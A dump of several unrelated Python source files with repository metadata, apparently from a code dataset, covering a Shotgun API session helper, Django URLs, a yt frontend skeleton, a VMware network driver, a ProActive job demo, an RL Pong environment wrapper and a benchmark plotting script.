found_ids = set(e['id'] for e in found)
for e in sub_entities:
e._exists = e['id'] in found_ids
return set(e for e in entities if (e._exists or e._exists is None))
@_assert_ownership
@_asyncable
def fetch(self, to_fetch, fields, force=False):
"""Fetch the named fields on the given entities.
:param list to_fetch: Entities to fetch fields for.
:param list fields: The names of fields to fetch on those entities.
:param bool force: Perform a request even if we already have this data?
This will safely handle multiple entitiy types at the same time, and
by default will only make requests of the server if some of the data
does not already exist.
.. note:: This does not assert that all "important" fields exist. See
:meth:`fetch_core`.
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self._fetch(entities, fields, force=force)
@_assert_ownership
@_asyncable
def fetch_backrefs(self, to_fetch, backref_type, field):
"""Fetch requested backrefs on the given entities.
:param list to_fetch: Entities to get backrefs on.
:param str backref_type: The entity type to look for backrefs on.
:param str field: The name of the field to look for backrefs in.
::
# Find all tasks which refer to this shot.
>>> session.fetch_backrefs([shot], 'Task', 'entity')
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self.find(backref_type, [[field, 'is'] + [x.minimal for x in entities]])
@_assert_ownership
@_asyncable
def fetch_core(self, to_fetch):
"""Assert all "important" fields exist, and fetch them if they do not.
:param list to_fetch: The entities to get the core fields on.
This will populate all important fields, and important fields on linked
entities.
"""
by_type = {}
for x in to_fetch:
by_type.setdefault(x['type'], set()).add(x)
for type_, entities in by_type.iteritems():
self._fetch(entities, itertools.chain(
self.important_fields_for_all,
self.important_fields.get(type_) or (),
self.important_links.get(type_, {}).iterkeys(),
))
@_assert_ownership
@_asyncable
def fetch_heirarchy(self, to_fetch):
"""Populate the parents as far up as we can go, and return all involved.
With (new-ish) arbitrarily-deep-links on Shotgun, this method could be
made quite a bit more effiecient, since it should be able to request
the entire heirarchy for any given type at once.
See :attr:`parent_fields`.
"""
all_nodes = set()
to_resolve = set()
loop_count = 0
while to_fetch or to_resolve:
# Just in case (because we have messed this up a few times before).
if loop_count > 20:
raise RuntimeError('likely infinite loop')
loop_count += 1
# Go as far up as we already have for the specified entities.
for entity in to_fetch:
all_nodes.add(entity)
while entity.parent(fetch=False):
entity = entity.parent()
all_nodes.add(entity)
if entity['type'] != 'Project':
to_resolve.add(entity)
# There is nothing new to fetch; bail!
if not to_resolve:
break
# Find the type that we have the most entities of, and remove them
# from the list to resolve.
by_type = {}
for x in to_resolve:
all_nodes.add(x)
by_type.setdefault(x['type'], set()).add(x)
type_, to_fetch = max(by_type.iteritems(), key=lambda x: len(x[1]))
to_resolve.difference_update(to_fetch)
# Fetch the parent names.
ids = [x['id'] for x in to_fetch]
parent_name = self.parent_fields[type_]
found = self.find(type_, [['id', 'in'] + ids], [parent_name])
# Make sure we actually get something back for the parent field.
no_parent = [e['id'] for e in found if not e.get(parent_name)]
if no_parent:
raise ValueError('%s %s %s no %s' % (
type_,
', '.join(str(id_) for id_ in sorted(no_parent)),
'have' if len(no_parent) > 1 else 'has',
parent_name,
))
# Track those which didn't come back from the API. Normally, this
# wouldn't happen, but can result from a race condition OR from
# an error on the server side (or a caching layer).
missing = to_fetch.difference(found)
if missing:
raise EntityNotFoundError('%s %s %s not exist' % (
type_,
', '.join(str(id_) for id_ in sorted(no_parent)),
'do' if len(missing) > 1 else 'does',
))
return list(all_nodes)
_guessed_user_lock = threading.Lock()
@_asyncable
def guess_user(self, filter=('email', 'starts_with', '{login}@'), fields=(), fetch=True):
"""Guess Shotgun user from current login name.
Looks for $SHOTGUN_USER_ID in your environment, then a user with an
email that has the login name as the account.
:returns: ``dict`` of ``HumanUser``, or ``None``.
"""
with self._guessed_user_lock:
try:
user = self._guessed_user
except AttributeError:
user = self._guess_user(filter, fields, fetch)
if user:
Session._guessed_user = self.merge(user).as_dict()
else:
Session._guessed_user = None
if not user:
return
entity = self.merge(user)
if fields:
entity.fetch(fields)
return entity
def _guess_user(self, filter, fields, fetch):
# This envvar is used only for this purpose (at Western Post)
id_ = os.environ.get('SHOTGUN_USER_ID')
if id_:
return {'type': 'HumanUser', 'id': int(id_)}
if not fetch:
return
# This envvar is more general, and respected by shotgun_api3_registry.
login = os.environ.get('SHOTGUN_SUDO_AS_LOGIN')
if login:
return self.find_one('HumanUser', [
('login', 'is', login),
], fields or ())
# Finally, search for a user based on the current login.
try:
login = os.getlogin()
except OSError as e:
# this fails on the farm, so fall back onto the envvar
if e.errno != errno.ENOTTY:
raise
login = os.environ.get('USER')
filter_ = tuple(x.format(login=login) for x in filter)
return self.find_one('HumanUser', [filter_], fields)
| 36.921348
| 129
| 0.572373
|
2a33b7f91cebd111b2805b0a22b68cc8249af39d
| 249
|
py
|
Python
|
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | 3
|
2020-11-18T05:16:30.000Z
|
2021-03-08T06:36:01.000Z
|
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | null | null | null |
Yatube/hw02_community/posts/urls.py
|
abi83/YaPractice
|
1c3a5670ee2f872d4f872623a392755318b893b5
|
[
"MIT"
] | 1
|
2021-01-20T12:41:48.000Z
|
2021-01-20T12:41:48.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.posts_list, name='posts-list'),
path('group/', views.groups_list, name='groups-list'),
path('group/<slug:slug>/', views.group_posts, name='group-posts'),
]
| 27.666667
| 70
| 0.674699
|
60e6ebbec2fe7842144abe0d94ca1d6aebf1444c
| 5,757
|
py
|
Python
|
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
yt/frontends/_skeleton/data_structures.py
|
aemerick/yt
|
984484616d75c6d7603e71b9d45c5d617705a0e5
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import os
import numpy as np
import weakref
from yt.data_objects.grid_patch import \
AMRGridPatch
from yt.geometry.grid_geometry_handler import \
GridIndex
from yt.data_objects.static_output import \
Dataset
from .fields import SkeletonFieldInfo
class SkeletonGrid(AMRGridPatch):
_id_offset = 0
def __init__(self, id, index, level):
super(SkeletonGrid, self).__init__(
id, filename=index.index_filename, index=index)
self.Parent = None
self.Children = []
self.Level = level
def __repr__(self):
return "SkeletonGrid_%04i (%s)" % (self.id, self.ActiveDimensions)
class SkeletonHierarchy(GridIndex):
grid = SkeletonGrid
def __init__(self, ds, dataset_type='skeleton'):
self.dataset_type = dataset_type
self.dataset = weakref.proxy(ds)
# for now, the index file is the dataset!
self.index_filename = self.dataset.parameter_filename
self.directory = os.path.dirname(self.index_filename)
# float type for the simulation edges and must be float64 now
self.float_type = np.float64
super(SkeletonHierarchy, self).__init__(ds, dataset_type)
def _detect_output_fields(self):
# This needs to set a self.field_list that contains all the available,
# on-disk fields. No derived fields should be defined here.
# NOTE: Each should be a tuple, where the first element is the on-disk
# fluid type or particle type. Convention suggests that the on-disk
# fluid type is usually the dataset_type and the on-disk particle type
# (for a single population of particles) is "io".
pass
def _count_grids(self):
# This needs to set self.num_grids
pass
def _parse_index(self):
# This needs to fill the following arrays, where N is self.num_grids:
# self.grid_left_edge (N, 3) <= float64
# self.grid_right_edge (N, 3) <= float64
# self.grid_dimensions (N, 3) <= int
# self.grid_particle_count (N, 1) <= int
# self.grid_levels (N, 1) <= int
# self.grids (N, 1) <= grid objects
# self.max_level = self.grid_levels.max()
pass
def _populate_grid_objects(self):
# For each grid g, this must call:
# g._prepare_grid()
# g._setup_dx()
# This must also set:
# g.Children <= list of child grids
# g.Parent <= parent grid
# This is handled by the frontend because often the children must be
# identified.
pass
class SkeletonDataset(Dataset):
_index_class = SkeletonHierarchy
_field_info_class = SkeletonFieldInfo
def __init__(self, filename, dataset_type='skeleton',
storage_filename=None,
units_override=None):
self.fluid_types += ('skeleton',)
super(SkeletonDataset, self).__init__(filename, dataset_type,
units_override=units_override)
self.storage_filename = storage_filename
# refinement factor between a grid and its subgrid
# self.refine_by = 2
def _set_code_unit_attributes(self):
# This is where quantities are created that represent the various
# on-disk units. These are the currently available quantities which
# should be set, along with examples of how to set them to standard
# values.
#
# self.length_unit = self.quan(1.0, "cm")
# self.mass_unit = self.quan(1.0, "g")
# self.time_unit = self.quan(1.0, "s")
# self.time_unit = self.quan(1.0, "s")
#
# These can also be set:
# self.velocity_unit = self.quan(1.0, "cm/s")
# self.magnetic_unit = self.quan(1.0, "gauss")
pass
def _parse_parameter_file(self):
# This needs to set up the following items. Note that these are all
# assumed to be in code units; domain_left_edge and domain_right_edge
# will be converted to YTArray automatically at a later time.
# This includes the cosmological parameters.
#
# self.parameters <= full of code-specific items of use
# self.domain_left_edge <= array of float64
# self.domain_right_edge <= array of float64
# self.dimensionality <= int
# self.domain_dimensions <= array of int64
# self.periodicity <= three-element tuple of booleans
# self.current_time <= simulation time in code units
#
# We also set up cosmological information. Set these to zero if
# non-cosmological.
#
# self.cosmological_simulation <= int, 0 or 1
# self.current_redshift <= float
# self.omega_lambda <= float
# self.omega_matter <= float
# self.hubble_constant <= float
# optional (has default implementation)
# self.unique_identifier <= unique identifier for the dataset
# being read (e.g., UUID or ST_CTIME) (int)
pass
@classmethod
def _is_valid(self, *args, **kwargs):
# This accepts a filename or a set of arguments and returns True or
# False depending on if the file is of the type requested.
#
# The functionality in this method should be unique enough that it can
# differentiate the frontend from others. Sometimes this means looking
# for specific fields or attributes in the dataset in addition to
# looking at the file name or extension.
return False
| 39.703448
| 84
| 0.614382
|
75e8ee6f132dd309dc56b77e83bb42b76ddc3477
| 484
|
py
|
Python
|
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | 1
|
2018-03-28T03:15:02.000Z
|
2018-03-28T03:15:02.000Z
|
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | null | null | null |
apps/06_lolcat_factory/you_try/my_app/venv/Scripts/pip3.5-script.py
|
jstrat1618/python-jumpstart-course-demos
|
4f022653fd452d649a654dc94afb9c63797806ca
|
[
"MIT"
] | null | null | null |
#!C:\Users\JustinandAbigail\Desktop\python-jumpstart-course-demos-master\apps\06_lolcat_factory\you_try\my_app\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.5'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.5')()
)
| 37.230769
| 134
| 0.698347
|
9aa0ac9290de1ed776f8bcbe45b74f9d730ff56d
| 687
|
py
|
Python
|
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | 8
|
2018-12-19T17:30:10.000Z
|
2021-05-09T17:53:03.000Z
|
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | null | null | null |
learning/sources/source_gym_pong.py
|
bermeom/quadruped-robot
|
5570c720a27b26f94236ebc2ff41f0a1549f10b8
|
[
"MIT"
] | 2
|
2020-10-06T01:56:30.000Z
|
2021-04-28T18:31:39.000Z
|
from sources.source_gym import source_gym
import cv2
import numpy as np
##### SOURCE GYM PONG
class source_gym_pong( source_gym ):
### __INIT__
def __init__( self ):
source_gym.__init__( self , 'Pong-v4' )
### INFORMATION
def num_actions( self ): return 3
### MAP KEYS
def map_keys( self , actn ):
if actn[0] : return 1
if actn[1] : return 2
if actn[2] : return 3
### PROCESS OBSERVATION
def process( self , obsv ):
obsv = cv2.resize( obsv , ( 80 , 80 ) )
obsv = cv2.cvtColor( obsv , cv2.COLOR_BGR2GRAY )
_ , obsv = cv2.threshold( obsv , 97 , 255 , cv2.THRESH_BINARY )
return obsv
| 21.46875
| 71
| 0.588064
|
5d4979991a437be55854a04bc00e640ee651d788
| 9,228
|
py
|
Python
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 2
|
2015-06-15T02:16:33.000Z
|
2022-02-23T07:10:38.000Z
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 7
|
2016-05-13T06:39:45.000Z
|
2016-05-20T02:55:31.000Z
|
hybrid_cloud_patches/python/nova/virt/hybridvmwareapi/vif.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 4
|
2015-11-02T04:02:50.000Z
|
2021-05-13T17:06:00.000Z
|
"""VIF drivers for VMware."""
from oslo.config import cfg
from oslo.vmware import exceptions as vexc
from nova import exception
from nova.i18n import _
from nova.network import model
from nova.openstack.common import log as logging
from nova.virt.hybridvmwareapi import network_util
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vm_util
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
vmwareapi_vif_opts = [
cfg.StrOpt('vlan_interface',
default='vmnic0',
help='Physical ethernet adapter name for vlan networking'),
cfg.StrOpt('integration_bridge',
default='br-int',
help='Name of Integration Bridge'),
]
CONF.register_opts(vmwareapi_vif_opts, 'vmware')
def _get_associated_vswitch_for_interface(session, interface, cluster=None):
# Check if the physical network adapter exists on the host.
if not network_util.check_if_vlan_interface_exists(session,
interface, cluster):
raise exception.NetworkAdapterNotFound(adapter=interface)
# Get the vSwitch associated with the Physical Adapter
vswitch_associated = network_util.get_vswitch_for_vlan_interface(
session, interface, cluster)
if not vswitch_associated:
raise exception.SwitchNotFoundForNetworkAdapter(adapter=interface)
return vswitch_associated
def ensure_vlan_bridge(session, vif, cluster=None, create_vlan=True):
"""Create a vlan and bridge unless they already exist."""
vlan_num = vif['network'].get_meta('vlan')
bridge = vif['network']['bridge']
vlan_interface = CONF.vmware.vlan_interface
network_ref = network_util.get_network_with_the_name(session, bridge,
cluster)
if network_ref and network_ref['type'] == 'DistributedVirtualPortgroup':
return network_ref
if not network_ref:
# Create a port group on the vSwitch associated with the
# vlan_interface corresponding physical network adapter on the ESX
# host.
vswitch_associated = \
_get_associated_vswitch_for_interface(session,
vlan_interface,
cluster)
network_util.create_port_group(session, bridge,
vswitch_associated,
vlan_num if create_vlan else 0,
cluster)
network_ref = network_util.get_network_with_the_name(session,
bridge,
cluster)
elif create_vlan:
# Get the vSwitch associated with the Physical Adapter
vswitch_associated = \
_get_associated_vswitch_for_interface(session,
vlan_interface, cluster)
# Get the vlan id and vswitch corresponding to the port group
_get_pg_info = network_util.get_vlanid_and_vswitch_for_portgroup
pg_vlanid, pg_vswitch = _get_pg_info(session, bridge, cluster)
# Check if the vswitch associated is proper
if pg_vswitch != vswitch_associated:
raise exception.InvalidVLANPortGroup(
bridge=bridge, expected=vswitch_associated,
actual=pg_vswitch)
# Check if the vlan id is proper for the port group
if pg_vlanid != vlan_num:
raise exception.InvalidVLANTag(bridge=bridge, tag=vlan_num,
pgroup=pg_vlanid)
return network_ref
def _is_valid_opaque_network_id(opaque_id, bridge_id, integration_bridge,
num_networks):
return (opaque_id == bridge_id or
(num_networks == 1 and
opaque_id == integration_bridge))
def _get_network_ref_from_opaque(opaque_networks, integration_bridge, bridge):
num_networks = len(opaque_networks)
for network in opaque_networks:
if _is_valid_opaque_network_id(network['opaqueNetworkId'], bridge,
integration_bridge, num_networks):
return {'type': 'OpaqueNetwork',
'network-id': network['opaqueNetworkId'],
'network-name': network['opaqueNetworkName'],
'network-type': network['opaqueNetworkType']}
LOG.warning(_("No valid network found in %(opaque)s, from %(bridge)s "
"or %(integration_bridge)s"),
{'opaque': opaque_networks, 'bridge': bridge,
'integration_bridge': integration_bridge})
def _get_opaque_network(session, cluster):
host = vm_util.get_host_ref(session, cluster)
try:
opaque = session._call_method(vim_util, "get_dynamic_property", host,
"HostSystem",
"config.network.opaqueNetwork")
except vexc.InvalidPropertyException:
opaque = None
return opaque
def get_neutron_network_with_vlan(session, vif,
portgroup_instance_mapping,
cluster=None, create_vlan=True):
"""Create a vlan and bridge unless they already exist."""
vlan_num = portgroup_instance_mapping.vlan
pg_name = portgroup_instance_mapping.pg_name
dvs_name = portgroup_instance_mapping.dvs_name
# Create a port group on the vSwitch associated with the
# vlan_interface corresponding physical network adapter on the ESX
# host.
network_util.create_dvportgroup_task(session, pg_name, dvs_name,
vlan_num if create_vlan else 0,
cluster)
network_ref = network_util.get_network_with_the_name(session,
pg_name,
cluster)
return network_ref
def remove_neutron_relation_pg(session, cluster, portgroup_instance_mapping):
"""Create a vlan and bridge unless they already exist."""
pg_name = portgroup_instance_mapping.pg_name
dvs_name = portgroup_instance_mapping.dvs_name
# Create a port group on the vSwitch associated with the
# vlan_interface corresponding physical network adapter on the ESX
# host.
network_util.delete_dvportgroup_task(session, pg_name, dvs_name, cluster)
def get_neutron_network(session, network_name, cluster, vif):
opaque = None
if vif['type'] != model.VIF_TYPE_DVS:
opaque = _get_opaque_network(session, cluster)
if opaque:
bridge = vif['network']['id']
opaque_networks = opaque.HostOpaqueNetworkInfo
network_ref = \
_get_network_ref_from_opaque(opaque_networks,
CONF.vmware.integration_bridge,
bridge)
else:
bridge = network_name
network_ref = network_util.get_network_with_the_name(
session, network_name, cluster)
if not network_ref:
raise exception.NetworkNotFoundForBridge(bridge=bridge)
return network_ref
def get_network_ref(session, cluster, vif, is_neutron, pg_vlan_instance_map):
if is_neutron:
portgroup_instance_mapping = pg_vlan_instance_map[vif['id']]
network_ref = get_neutron_network_with_vlan(
session,
vif,
portgroup_instance_mapping,
cluster)
else:
create_vlan = vif['network'].get_meta('should_create_vlan', False)
network_ref = ensure_vlan_bridge(session, vif, cluster=cluster,
create_vlan=create_vlan)
return network_ref
def get_vif_dict(session, cluster, vif_model, is_neutron, vif,
pg_vlan_instance_map):
mac = vif['address']
name = vif['network']['bridge'] or CONF.vmware.integration_bridge
ref = get_network_ref(
session,
cluster,
vif,
is_neutron,
pg_vlan_instance_map)
return {'network_name': name,
'mac_address': mac,
'network_ref': ref,
'iface_id': vif['id'],
'vif_model': vif_model}
def get_vif_info(session, cluster, is_neutron,
vif_model, network_info, pg_vlan_instance_map):
vif_infos = []
if network_info is None:
return vif_infos
for vif in network_info:
vif_infos.append(get_vif_dict(session, cluster, vif_model,
is_neutron, vif, pg_vlan_instance_map))
return vif_infos
def get_network_device(hardware_devices, mac_address):
"""Return the network device with MAC 'mac_address'."""
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ in vm_util.ALL_SUPPORTED_NETWORK_DEVICES:
if hasattr(device, 'macAddress'):
if device.macAddress == mac_address:
return device
| 40.651982
| 78
| 0.62332
|
0c060fffd63e80fad5478d5838aeb3f8deb6786b
| 2,772
|
py
|
Python
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 5
|
2018-04-04T12:37:18.000Z
|
2020-05-28T08:59:10.000Z
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 11
|
2018-03-27T12:43:54.000Z
|
2022-01-18T07:01:02.000Z
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 6
|
2018-03-15T16:17:01.000Z
|
2020-11-02T03:02:57.000Z
|
import os
import proactive
print("Logging on proactive-server...")
proactive_host = 'try.activeeon.com'
proactive_port = '8080'
proactive_url = "http://"+proactive_host+":"+proactive_port
print("Connecting on: " + proactive_url)
javaopts = []
# uncomment for detailed logs
# javaopts.append('-Dlog4j.configuration=file:'+os.path.join(os.getcwd(),'log4j.properties'))
redirectJVMOutput = False
gateway = proactive.ProActiveGateway(proactive_url, javaopts, redirectJVMOutput)
gateway.connect(username="", password="") # put your login here!
# Or uncomment the following line to protect your password
# gateway.connect(username="", password=getpass.getpass(prompt='Password: '))
assert gateway.isConnected() is True
print("Connected")
try:
print("Creating a proactive task...")
proactive_task = gateway.createPythonTask()
proactive_task.setTaskName("SimplePythonTask")
proactive_task.setTaskImplementation("""print("Hello world!")""")
# proactive_task.setTaskImplementationFromFile("scripts/print_python_env.py")
# proactive_task.setTaskImplementationFromFile("scripts/hello.py", ['param_a', 'param_b'])
# proactive_task.setTaskImplementationFromFile('main.py', ['param_1', 'param_2'])
# proactive_task.addInputFile('scripts/__init__.py')
# proactive_task.addInputFile('scripts/hello.py')
# proactive_task.setTaskImplementationFromLambdaFunction(lambda: 88 - 20 * 10)
# proactive_task.addGenericInformation("PYTHON_COMMAND", "/usr/local/bin/python3")
print("Adding a fork environment to the proactive task...")
proactive_fork_env = gateway.createDefaultForkEnvironment()
proactive_fork_env.setImplementationFromFile("scripts/fork_env.py")
proactive_task.setForkEnvironment(proactive_fork_env)
print("Adding a selection script to the proactive task...")
proactive_selection_script = gateway.createDefaultSelectionScript()
proactive_selection_script.setImplementation("selected = True")
# proactive_selection_script.setImplementationFromFile("scripts/selection_script.py")
proactive_task.setSelectionScript(proactive_selection_script)
print("Creating a proactive job...")
proactive_job = gateway.createJob()
proactive_job.setJobName("SimpleJob")
proactive_job.addTask(proactive_task)
proactive_job.setInputFolder(os.getcwd())
proactive_job.setOutputFolder(os.getcwd())
print("Submitting the job to the proactive scheduler...")
job_id = gateway.submitJob(proactive_job, debug=False)
print("job_id: " + str(job_id))
print("Getting job output...")
job_result = gateway.getJobResult(job_id)
print(job_result)
finally:
print("Disconnecting")
gateway.disconnect()
print("Disconnected")
gateway.terminate()
print("Finished")
| 42
| 94
| 0.758297
|
324db507a7a99c816e4f14473add5c7acc27831b
| 4,238
|
py
|
Python
|
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-02-25T15:56:36.000Z
|
2022-02-25T17:53:10.000Z
|
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
from argparse import ArgumentParser
from pathlib import Path
from typing import Dict
import sagemaker
from matplotlib import cm
import numpy as np
from syne_tune.constants import ST_TUNER_TIME, SYNE_TUNE_FOLDER
from syne_tune.experiments import load_experiments_df
import matplotlib.pyplot as plt
def show_results(df_task, title: str, colors: Dict, show_seeds: bool = False):
if len(df_task) > 0:
metric = df_task.loc[:, 'metric'].values[0]
mode = df_task.loc[:, 'mode'].values[0]
fig, ax = plt.subplots()
for algorithm in sorted(df_task.algorithm.unique()):
ts = []
ys = []
df_scheduler = df_task[df_task.algorithm == algorithm]
for i, tuner_name in enumerate(df_scheduler.tuner_name.unique()):
sub_df = df_scheduler[df_scheduler.tuner_name == tuner_name]
sub_df = sub_df.sort_values(ST_TUNER_TIME)
t = sub_df.loc[:, ST_TUNER_TIME].values
y_best = sub_df.loc[:, metric].cummax().values if mode == 'max' else sub_df.loc[:, metric].cummin().values
if show_seeds:
ax.plot(t, y_best, color=colors[algorithm], alpha=0.2)
ts.append(t)
ys.append(y_best)
# compute the mean/std over time-series of different seeds at regular time-steps
# start/stop at respectively first/last point available for all seeds
t_min = max(tt[0] for tt in ts)
t_max = min(tt[-1] for tt in ts)
if t_min > t_max:
continue
t_range = np.linspace(t_min, t_max)
# find the best value at each regularly spaced time-step from t_range
y_ranges = []
for t, y in zip(ts, ys):
indices = np.searchsorted(t, t_range, side="left")
y_range = y[indices]
y_ranges.append(y_range)
y_ranges = np.stack(y_ranges)
mean = y_ranges.mean(axis=0)
std = y_ranges.std(axis=0)
ax.fill_between(
t_range, mean - std, mean + std,
color=colors[algorithm], alpha=0.1,
)
ax.plot(t_range, mean, color=colors[algorithm], label=algorithm)
ax.set_xlabel("wallclock time")
ax.set_ylabel(metric)
ax.legend()
ax.set_title(title)
(Path(__file__).parent / "figures").mkdir(exist_ok=True)
plt.savefig(f"figures/{title}.png")
plt.tight_layout()
plt.show()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument(
"--experiment_tag", type=str, required=True,
help="the experiment tag that was displayed when running launch_rl_benchmark.py"
)
args, _ = parser.parse_known_args()
experiment_tag = args.experiment_tag
logging.getLogger().setLevel(logging.INFO)
print(f"In case you ran experiments remotely, we assume that you pulled your results by running in a terminal: \n"
f"aws s3 sync s3://{sagemaker.Session().default_bucket()}/{SYNE_TUNE_FOLDER}/{experiment_tag}/ ~/syne-tune/")
experiment_filter = lambda exp: exp.metadata.get("tag") == experiment_tag
name_filter = lambda path: experiment_tag in path
df = load_experiments_df(name_filter, experiment_filter)
benchmarks = df.benchmark.unique()
for benchmark in benchmarks:
df_task = df.loc[df.benchmark == benchmark, :]
cmap = cm.Set3
colors = {algorithm: cmap(i) for i, algorithm in enumerate(df.algorithm.unique())}
show_results(df_task=df_task, title=benchmark, colors=colors)
| 39.981132
| 128
| 0.641812
|
1f7072c65b0c333a1f062a036bc5208e1dd479c0
| 2,660
|
py
|
Python
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 7
|
2019-09-10T16:46:15.000Z
|
2022-03-12T18:42:15.000Z
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 10
|
2017-12-18T18:37:08.000Z
|
2018-10-01T17:55:57.000Z
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 12
|
2019-04-04T09:27:55.000Z
|
2022-03-31T05:09:17.000Z
|
"""
AzureImagePredictor
ImagePredictor implementation for Azure Face API
"""
from simplesensor.shared.threadsafeLogger import ThreadsafeLogger
from .imagePredictor import ImagePredictor
import urllib.parse
import json
import requests
# import logging
class AzureImagePredictor(ImagePredictor):
def __init__(self, moduleConfig=None, loggingQueue=None):
"""
Initialize new AzureImagePrediction instance.
Set parameters required by Azure Face API.
"""
# logging.basicConfig(level=logging.CRITICAL)
self.logger = ThreadsafeLogger(loggingQueue, "AzureImagePrediction") # Setup logging queue
self.config = moduleConfig
# Constants
self._subscriptionKey = self.config['Azure']['SubscriptionKey']
self._uriBase = self.config['Azure']['UriBase']
self._headers = {
'Content-Type': 'application/octet-stream',
'Ocp-Apim-Subscription-Key': self._subscriptionKey,
}
self._params = urllib.parse.urlencode({
"returnFaceId": "true",
"returnFaceLandmarks": "false",
"returnFaceAttributes": "age,gender,glasses,facialHair"
})
def get_prediction(self, imageBytes):
""" Get prediction results from Azure Face API.
Returns object with either a predictions array property or an error property.
"""
resultData = {}
try:
tempResult = self._get_prediction(imageBytes)
resultData['predictions'] = tempResult
except Exception as e:
self.logger.error('Error getting prediction: %s'%e)
resultData['error'] = str(e)
return resultData
def _get_prediction(self,imageBytes):
""" Execute REST API call and return result """
if len(self._subscriptionKey) < 10:
raise EnvironmentError('Azure subscription key - %s - is not valid'%self._subscriptionKey)
else:
try:
api_url = "https://%s/face/v1.0/detect?%s"% (self._uriBase, self._params)
r = requests.post(api_url,
headers=self._headers,
data=imageBytes)
if r.status_code != 200:
raise ValueError(
'Request to Azure returned an error %s, the response is:\n%s'
% (r.status_code, r.text)
)
jsonResult = r.json()
self.logger.debug("Got azure data %s" %jsonResult)
return jsonResult
except Exception as e:
self.logger.error(e)
| 34.102564
| 102
| 0.595865
|
4c82cdfcaa42ee37e34212249db588d2fe09fa08
| 15,456
|
py
|
Python
|
preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | 1
|
2020-11-04T09:18:23.000Z
|
2020-11-04T09:18:23.000Z
|
preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | null | null | null |
